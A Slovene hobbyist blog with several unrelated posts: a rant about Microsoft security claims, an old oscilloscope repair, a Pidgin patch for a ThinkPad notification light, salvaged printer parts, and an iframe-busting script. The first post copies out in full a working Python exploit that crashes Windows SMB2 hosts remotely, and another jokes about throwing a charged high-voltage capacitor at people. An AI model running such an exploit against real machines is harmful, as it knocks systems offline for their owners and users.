Another day in a geek’s life

Pred par dnevi je na slashdotu pojavil topic¹  o Microsoftovih training slajdih, kjer so BestBuy zaposlene izobraževali kok je Win7 “ql”, in kok je Linux “beden”.  Konkreten slajd, ki mi je privlekel pozornost je bil tudi:

Torej… ko pride do kakega grdega b00ga, exploita ipd, so userji “on their own”, če uporabljajo Microsoft priozvode, so pa “safe and secure”…

No in danes mi je @Kostko poslal zanimiv link (click here), kjer se nahaja kratka python skripta, ki na oddaljeni mašini sproži BSOD.  In kako je sedaj z ‘zagarantirano varnostjo’? Citiram:

Vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided.

Hmm.. očitno bo najbolje da izklopimo M$ file serverje, zakurimo ogenj in čakamo

In za vsak slučaj, da ne bi exploit kam izginil, dajem kopijo sem:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
 
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
 
)
s = socket()
 
s.connect(host)
s.send(buff)
s.close()

ps:  zadeva se je pojavila tudi na slashdotu (click here)

pps:

(21:19:09) Anze: na zobavniku potrjeno bsod dela na visti
(21:19:12) Anze: win7 je safe <--????
(21:19:16) Anze: win 2k8 pade

geek stuff, rant 0-day, exploit, linux, microsoft, python

V Beogradu na Kalenić pijaci sem našel tole igračko, za relativno nizko ceno (cca 15eur). Sond za njega nažalost (še) nimam, a imam v načrtu predelavo konektorjev v klasične BNC. Popolnoma stestiral ga zato še nisem, a tudi brez sond lepo prikazuje 50Hz šum.

Večina stvari (vsaj na prvi pogled) deluje… za tiste za katere ne vem kaj naj bi počele, pa upam da bom uspel dobiti originalna navodila zanj. Prav tako mislim da bo potrebno zamenjati nekaj elektrolitov, a to je malenkost.

Na zadnji strani je tudi zanimiv priključek X1, za katerega ugibam da naj bi predstavljal neko zunanje proženje (upam). Vidi se pa tudi letnica 1983, in kratica ZIP, ki upam da je ime podjetja ki ga je izdelalo. Googlanje za ‘zip’-om še ni bilo uspešno… ampak upam da se bo našlo kaj.

Torej ja… i can has a new toy!

Edit 1: Treba je bilo prelotat ene dva kabla in sedaj lepo prikazuje signal… problem je le, da je slika razhlo postrani, tako da bom jutri (torej danes, samo po tem ko grem spat in se spet zbudim) pregledal odklonski sistem (ali pa zavrtel celo katodno cev)

Edit 2: Katodna cev naravnana in fiksirana, napajalni kabel zamenjan z dalšim, in ozemljitev pobrana z energetskega omrežja.  Konektorjev še nisem zamenjal z bnc-ji, ker mislim da bo treba povečat luknje, a nisem 100%.  Zazdaj dela brez problema

ps:  Zahvala Branku za navodila

elektro stuff, geek stuff cccp, osciloskop, toy

Thinkpad laptopi imajo nad displayem vgrajeno lučko za osvetlitev tipkovnice.  Ker je v R seriji oranžne barve, je precej neuporabna (sicer pa, kdo pa še gleda pod prste med tipkanjem?). In potem ma pidgin ‘tam doli’ v trayu ikonco, ki v neaktivnem stanju kaže status (available, away,…) in ko dobiš novo sporočilo, se le-ta obarva oranžno.  Če gledaš film iz postelje, in če je zvok v filmu glasen (glasno posnet), se pidginovega piskanja sploh ne sliši, ikonica v trayu je pa seveda prekrita s filmom. Tedaj bi si človek zaželel kakega drugega načina notifikacije o neprebranih sporočilih…. in jaz sem se odločil uporabiti prej omenjeno lučko za osvetlitev tipkovnice.

Patch spodaj spada med grde hacke (TM), in za razliko od mojih one-line patchev… je tukaj potrebo dodati kar celi (pazi dvojina!) dve vrstici (pazi dvojina spet)! Seveda zaradi oklepajev in zaklepajev, to število naraste kar na magičlnih 4 vrstic spremebe v kodi ) Zakaj pa grd hack? Zaradi system()-a, pa še česa… sj bi se dalo lepše to narest, brez klicev zunanjih programov, a ker sem len… naj gdo drug popravi ) Patch je tudi thinkpad-specific, a se ga da enostavno prilagoditi.

Evo patch:

diff -Naur pidgin-2.5.8/pidgin/gtkdocklet-x11.c pidgin-2.5.8-l/pidgin/gtkdocklet-x11.c
--- pidgin-2.5.8/pidgin/gtkdocklet-x11.c	2009-06-28 04:05:26.000000000 +0200
+++ pidgin-2.5.8-l/pidgin/gtkdocklet-x11.c	2009-07-19 17:18:13.000000000 +0200
@@ -115,10 +117,14 @@
 		default:
 			icon_name = PIDGIN_STOCK_TRAY_AVAILABLE;
 			break;
+
 	}
 
-	if (pending)
+	if (!pending) system("echo off > /proc/acpi/ibm/light");
+	if (pending) {
 		icon_name = PIDGIN_STOCK_TRAY_PENDING;
+		system("echo on > /proc/acpi/ibm/light");
+	}
 	if (connecting)
 		icon_name = PIDGIN_STOCK_TRAY_CONNECT;

Seveda je ukaz znotraj system(“tole tle mislm“) mogoče spremeniti po želji, in lahko z recimo “eject /dev/cdrom” ejecta cdrom ob čakajočem sporočilu, in z “eject -t /dev/cdrom” spet injecta(?) ko ni več čakajočih sporočil.

Patch worksForMe(TM) na pidginu 2.5.8. Seveda če se zaradi patcha vaš računalnik samovžge, eksplodira, ali pa iz njega skočijo škratki ki začnejo štrajkati, nisem jaz nič kriv, in me sploh ni blo zraven.

Have fun!

geek stuff hack, light, notification, pidgin, thinkpad

First of all, why is this post in English?  First reason would be, that Enlish language is widely understood (in comparison to Slovene)… the not-so-obvious reason is, that some people keep bugging me about my Slovene and a thing called “dvojina”. Dvojina is a really nasty part Slovene vocabulary (probably because there are only (iirc) 2 languages that use it).  For example, I usually say “dve ure” [two hours], and those people immediately correct me, and say “dve uri” [two hours]… Tomato, tomato…  They should probably create a Toporišič fan club

So, because the intro was relatively long, I am going to make the rest of the post shorter (i’m lazy, so what).

A couple of weeks ago¹ Brodul² and I decided to trash/wreck/destroy an old non-working laser printer, and harvested some interesting parts. Most of the motors, and the laster module are still in Kiberpipa, but I decided to keep 1 capacitor and 4 resistors.

Why the capacitor?³

As you can see in the picture, it is a 330uF capacitor, built for 400 volts. Anyone who ever tried charging a high-voltage capacitor in a wall outlet (for example through a bridge rectifier) and throwing it towards someone else to catch,  knows how funny that is

And why the resistors? Aren’t they dirt cheap?⁴

These are 2.6ohm 20W resistors (4 of them), they were used in the printers power supply, and when fully loaded released 80 watts of heat. That’s more power then your whole laptop uses… and all of it went to (probably unwanted) heat.

I can’t wait for the next ‘breaking and smashing day’ in kiberpipa

elektro stuff, geek stuff

Enkrat sem že pisal o seriji Numb3rs in neumnosti v njej, ampak, ker naslednje opažam v vse več serijah, se mi je zdelo vredno narediti še en screenshot.

Ip je eno 32bitno število, ki ga zapišemo kot niz 4ih 8bitnih števil, od katerih lahko vsako zavzema vrednosti med 0 in 255. Sicer verjamem da je pri naključnem izbiranju števil težko zadeti prave vrednosti (približno četrtina jih je pravilnih), a človek bi pričakoval, da bi vsaj tisti, ki dizajnirajo scene (in tudi prikaze na računalniku) vsaj malo poznali računalniška omrežja.

In ja… screenshot… spet Numb3rs S05E23  (pa čeprav sem videl to že marsikje drugje).

geek stuff, rant, spam

Dosti servisov (recimo google image search), prikaže stran znotraj iframe-a (in tudi da direkten link do slike), kar (nam) dostim ni všeč. Naslednjih nekaj vrstic kode povzroči da stran “pobegne” iz iframe-a in se pojavi kot “glavna” stran.

<script>
if (top.location!= self.location) { 
  top.location = self.location.href
</script>

Mogoče komu koristi, … mogoče pa bo le pomoč meni, ko bom naslednjič iskal kaj takega, in pozabil kako se to napiše¹

geek stuff iframe, javascript